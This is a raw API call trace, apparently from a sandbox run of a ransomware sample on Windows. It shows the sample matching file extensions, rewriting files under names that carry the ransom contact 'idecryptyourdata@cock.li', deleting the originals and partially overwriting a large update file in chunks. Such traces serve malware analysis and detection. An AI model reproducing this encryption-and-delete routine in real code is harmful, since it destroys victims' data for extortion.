lstrlenW (lpString=".zip") returned 4 [0056.551] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.551] lstrlenW (lpString=".rar") returned 4 [0056.551] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.551] lstrlenW (lpString=".bz2") returned 4 [0056.551] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.551] lstrlenW (lpString=".7z") returned 3 [0056.551] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString=".dbf") returned 4 [0056.551] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString=".1cd") returned 4 [0056.551] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString=".jpg") returned 4 [0056.551] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.551] lstrlenW (lpString=".doc") returned 4 [0056.552] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0056.552] lstrlenW (lpString=".docx") returned 5 [0056.552] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0056.552] lstrlenW (lpString=".pdf") returned 4 [0056.552] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0056.552] lstrlenW (lpString=".xls") returned 4 [0056.552] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0056.552] lstrlenW (lpString=".xlsx") returned 5 [0056.552] lstrcmpiW (lpString1=".xlsx", lpString2="6.msi") returned -1 [0056.552] lstrlenW (lpString=".ppt") returned 4 [0056.552] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0056.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.552] lstrlenW (lpString=".zip") returned 4 [0056.552] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0056.552] lstrlenW (lpString=".rar") returned 4 [0056.552] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0056.552] lstrlenW (lpString=".bz2") returned 4 [0056.552] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0056.552] lstrlenW (lpString=".7z") returned 3 [0056.552] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0056.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.552] lstrlenW (lpString=".dbf") returned 4 [0056.552] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0056.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.552] lstrlenW (lpString=".1cd") returned 4 [0056.552] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0056.552] lstrlenW (lpString="C:\\588bce7c90097ed212\\RGB9Rast_x86.msi") returned 38 [0056.552] lstrlenW (lpString=".jpg") returned 4 [0056.552] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0056.552] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0056.552] lstrlenW (lpString="SetupUi.dll") returned 11 [0056.552] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.553] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=295248) returned 1 [0056.553] CloseHandle (hObject=0x324) returned 1 [0056.553] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 0x80 [0056.553] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.553] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.553] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.553] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.553] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setupui.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0056.553] GetLastError () returned 0x0 [0056.553] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x48150, lpOverlapped=0x0) returned 1 [0056.578] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x48160, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x48160, lpOverlapped=0x0) returned 1 [0056.654] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0056.654] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xea, lpOverlapped=0x0) returned 1 [0056.654] SetEndOfFile (hFile=0x2d4) returned 1 [0056.654] CloseHandle (hObject=0x2d4) returned 1 [0056.659] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.659] SetEndOfFile (hFile=0x324) returned 1 [0056.662] CloseHandle (hObject=0x324) returned 1 [0056.663] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0056.663] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.dll" (normalized: "c:\\588bce7c90097ed212\\setupui.dll")) returned 1 [0056.663] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.663] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.663] lstrlenW (lpString=".doc") returned 4 [0056.663] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.663] lstrlenW (lpString=".docx") returned 5 [0056.663] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0056.663] lstrlenW (lpString=".pdf") returned 4 [0056.663] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.663] lstrlenW (lpString=".xls") returned 4 [0056.664] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString=".xlsx") returned 5 [0056.664] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0056.664] lstrlenW (lpString=".ppt") returned 4 [0056.664] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString=".zip") returned 4 [0056.664] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString=".rar") returned 4 [0056.664] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString=".bz2") returned 4 [0056.664] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.664] lstrlenW (lpString=".7z") returned 3 [0056.664] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString=".dbf") returned 4 [0056.664] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString=".1cd") returned 4 [0056.664] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString=".jpg") returned 4 [0056.664] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.664] lstrlenW (lpString=".doc") returned 4 [0056.664] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.664] lstrlenW (lpString=".docx") returned 5 [0056.664] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0056.665] lstrlenW (lpString=".pdf") returned 4 [0056.665] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.665] lstrlenW (lpString=".xls") returned 4 [0056.665] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.665] lstrlenW (lpString=".xlsx") returned 5 [0056.665] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0056.665] lstrlenW (lpString=".ppt") returned 4 [0056.665] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.665] lstrlenW (lpString=".zip") returned 4 [0056.665] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.665] lstrlenW (lpString=".rar") returned 4 [0056.665] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.665] lstrlenW (lpString=".bz2") returned 4 [0056.665] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.665] lstrlenW (lpString=".7z") returned 3 [0056.665] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.665] lstrlenW (lpString=".dbf") returned 4 [0056.665] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.665] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.665] lstrlenW (lpString=".1cd") returned 4 [0056.665] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.666] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.dll") returned 33 [0056.666] lstrlenW (lpString=".jpg") returned 4 [0056.666] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.666] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0056.666] lstrlenW (lpString="SetupUtility.exe") returned 16 [0056.666] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.666] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=96088) returned 1 [0056.666] CloseHandle (hObject=0x324) returned 1 [0056.666] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 0x80 [0056.666] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.666] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0056.667] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.667] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0056.667] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0056.667] GetLastError () returned 0x0 [0056.667] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x17758, lpOverlapped=0x0) returned 1 [0057.202] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0x17760, lpOverlapped=0x0) returned 1 [0057.204] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2f8fecc, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesRead=0x2f8fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.204] WriteFile (in: hFile=0x2d4, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2f8fc94, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fc94*=0xf4, lpOverlapped=0x0) returned 1 [0057.204] SetEndOfFile (hFile=0x2d4) returned 1 [0057.204] CloseHandle (hObject=0x2d4) returned 1 [0057.209] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.209] SetEndOfFile (hFile=0x324) returned 1 [0057.210] CloseHandle (hObject=0x324) returned 1 [0057.210] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0057.210] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 1 [0057.210] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.210] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.210] lstrlenW (lpString=".doc") returned 4 [0057.211] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0057.211] lstrlenW (lpString=".docx") returned 5 [0057.211] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0057.211] lstrlenW (lpString=".pdf") returned 4 [0057.211] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString=".xls") returned 4 [0057.211] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString=".xlsx") returned 5 [0057.211] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0057.211] lstrlenW (lpString=".ppt") returned 4 [0057.211] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString=".zip") returned 4 [0057.211] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString=".rar") returned 4 [0057.211] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString=".bz2") returned 4 [0057.211] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0057.211] lstrlenW (lpString=".7z") returned 3 [0057.211] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString=".dbf") returned 4 [0057.211] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString=".1cd") returned 4 [0057.211] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString=".jpg") returned 4 [0057.211] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.211] lstrlenW (lpString=".doc") returned 4 [0057.211] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0057.212] lstrlenW (lpString=".docx") returned 5 [0057.212] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0057.212] lstrlenW (lpString=".pdf") returned 4 [0057.212] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0057.212] lstrlenW (lpString=".xls") returned 4 [0057.212] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0057.212] lstrlenW (lpString=".xlsx") returned 5 [0057.212] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0057.212] lstrlenW (lpString=".ppt") returned 4 [0057.212] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0057.212] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.212] lstrlenW (lpString=".zip") returned 4 [0057.212] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0057.212] lstrlenW (lpString=".rar") returned 4 [0057.212] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0057.212] lstrlenW (lpString=".bz2") returned 4 [0057.212] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0057.212] lstrlenW (lpString=".7z") returned 3 [0057.212] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0057.212] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.212] lstrlenW (lpString=".dbf") returned 4 [0057.212] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0057.212] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.212] lstrlenW (lpString=".1cd") returned 4 [0057.212] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0057.212] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0057.212] lstrlenW (lpString=".jpg") returned 4 [0057.212] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0057.212] lstrcmpiW (lpString1=".msu", lpString2=".bat") returned 1 [0057.212] lstrlenW (lpString="Windows6.0-KB956250-v6001-x64.msu") returned 33 [0057.213] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0057.213] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2f8ff14 | out: lpFileSize=0x2f8ff14*=5198099) returned 1 [0057.213] CloseHandle (hObject=0x324) returned 1 [0057.213] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu")) returned 0x80 [0057.214] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.214] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), lpNewFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0057.214] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0057.214] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc64 | out: lpNewFilePointer=0x0) returned 1 [0057.214] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.214] ReadFile (in: hFile=0x324, lpBuffer=0x3cf9058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f8fc30, lpOverlapped=0x0 | out: lpBuffer=0x3cf9058*, lpNumberOfBytesRead=0x2f8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.218] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.218] ReadFile (in: hFile=0x324, lpBuffer=0x3d39058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f8fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d39058*, lpNumberOfBytesRead=0x2f8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.220] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2f8fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0057.220] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc24 | out: lpNewFilePointer=0x0) returned 1 [0057.220] ReadFile (in: hFile=0x324, lpBuffer=0x3d79058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f8fc30, lpOverlapped=0x0 | out: lpBuffer=0x3d79058*, lpNumberOfBytesRead=0x2f8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0057.234] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.234] WriteFile (in: hFile=0x324, lpBuffer=0x3cf9020*, nNumberOfBytesToWrite=0xc012e, lpNumberOfBytesWritten=0x2f8fca8, lpOverlapped=0x0 | out: lpBuffer=0x3cf9020*, lpNumberOfBytesWritten=0x2f8fca8*=0xc012e, lpOverlapped=0x0) returned 1 [0057.915] SetEndOfFile (hFile=0x324) returned 1 [0057.915] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0057.915] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.915] WriteFile (in: hFile=0x324, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2f8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.917] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x1a705b, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.917] WriteFile (in: hFile=0x324, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2f8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.919] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x4b5113, lpNewFilePointer=0x0, dwMoveMethod=0x2f8fc74 | out: lpNewFilePointer=0x0) returned 1 [0057.919] WriteFile (in: hFile=0x324, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2f8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0057.921] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0057.921] CloseHandle (hObject=0x324) returned 1 [0059.454] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0059.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.454] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.454] lstrlenW (lpString=".doc") returned 4 [0059.454] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0059.454] lstrlenW (lpString=".docx") returned 5 [0059.454] lstrcmpiW (lpString1=".docx", lpString2="4.msu") returned -1 [0059.454] lstrlenW (lpString=".pdf") returned 4 [0059.454] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0059.454] lstrlenW (lpString=".xls") returned 4 [0059.454] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0059.454] lstrlenW (lpString=".xlsx") returned 5 [0059.454] lstrcmpiW (lpString1=".xlsx", lpString2="4.msu") returned -1 [0059.454] lstrlenW (lpString=".ppt") returned 4 [0059.455] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString=".zip") returned 4 [0059.455] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0059.455] lstrlenW (lpString=".rar") returned 4 [0059.455] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0059.455] lstrlenW (lpString=".bz2") returned 4 [0059.455] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0059.455] lstrlenW (lpString=".7z") returned 3 [0059.455] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString=".dbf") returned 4 [0059.455] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0059.455] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 55 [0059.455] lstrlenW (lpString=".1cd") returned 4 